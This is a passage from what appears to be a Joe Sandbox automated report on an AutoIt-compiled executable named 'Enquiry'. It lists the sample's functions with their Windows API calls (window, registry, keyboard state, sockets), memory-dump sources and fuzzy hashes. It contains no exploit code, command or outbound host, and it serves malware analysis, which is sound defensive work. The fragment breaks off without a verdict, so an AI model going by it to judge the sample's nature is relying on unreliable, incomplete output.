                            • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                            • String ID:
                            • API String ID: 1457242333-0
                            • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                            • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                            • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                            • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ConnectRegistry_memmove_wcslen
                            • String ID:
                            • API String ID: 15295421-0
                            • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                            • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                            • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                            • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                            APIs
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • _wcstok.LIBCMT ref: 004675B2
                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                            • _wcscpy.LIBCMT ref: 00467641
                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                            • _wcslen.LIBCMT ref: 00467793
                            • _wcslen.LIBCMT ref: 004677BD
                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                            • String ID: X
                            • API String ID: 780548581-3081909835
                            • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                            • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                            • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                            • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                            APIs
                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                            • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                            • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                            • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                            • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                            • CloseFigure.GDI32(?), ref: 0044751F
                            • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                            • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                            • String ID:
                            • API String ID: 4082120231-0
                            • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                            • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                            • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                            • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                            • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                            • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                            • String ID:
                            • API String ID: 2027346449-0
                            • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                            • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                            • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                            • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                            • GetMenu.USER32 ref: 0047A703
                            • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                            • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                            • _wcslen.LIBCMT ref: 0047A79E
                            • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                            • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                            • String ID:
                            • API String ID: 3257027151-0
                            • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                            • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                            • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                            • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                            APIs
                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorLastselect
                            • String ID:
                            • API String ID: 215497628-0
                            • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                            • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                            • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                            • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                            APIs
                            • GetParent.USER32(?), ref: 0044443B
                            • GetKeyboardState.USER32(?), ref: 00444450
                            • SetKeyboardState.USER32(?), ref: 004444A4
                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                            • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                            • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                            • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                            APIs
                            • GetParent.USER32(?), ref: 00444633
                            • GetKeyboardState.USER32(?), ref: 00444648
                            • SetKeyboardState.USER32(?), ref: 0044469C
                            • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                            • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                            • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                            • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                            • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                            • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                            • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __snwprintf__wcsicoll_wcscpy
                            • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                            • API String ID: 1729044348-3025626884
                            • Opcode ID: 7769a92cfab6b8d3931dc5c653c39d142ecf4e8a499bfed4412259d626728bb2
                            • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                            • Opcode Fuzzy Hash: 7769a92cfab6b8d3931dc5c653c39d142ecf4e8a499bfed4412259d626728bb2
                            • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                            APIs
                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                            • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                            • DeleteObject.GDI32(?), ref: 00455736
                            • DeleteObject.GDI32(?), ref: 00455744
                            • DestroyIcon.USER32(?), ref: 00455752
                            • DestroyWindow.USER32(?), ref: 00455760
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                            • String ID:
                            • API String ID: 2354583917-0
                            • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                            • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                            • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                            • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                            • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                            • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                            • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                            APIs
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$Enable$Show$MessageMoveSend
                            • String ID:
                            • API String ID: 896007046-0
                            • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                            • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                            • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                            • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                            APIs
                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                            • GetFocus.USER32 ref: 00448ACF
                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$Enable$Show$FocusMessageSend
                            • String ID:
                            • API String ID: 3429747543-0
                            • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                            • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                            • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                            • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                            • __swprintf.LIBCMT ref: 0045D4E9
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume__swprintf
                            • String ID: %lu$\VH
                            • API String ID: 3164766367-2432546070
                            • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                            • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                            • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
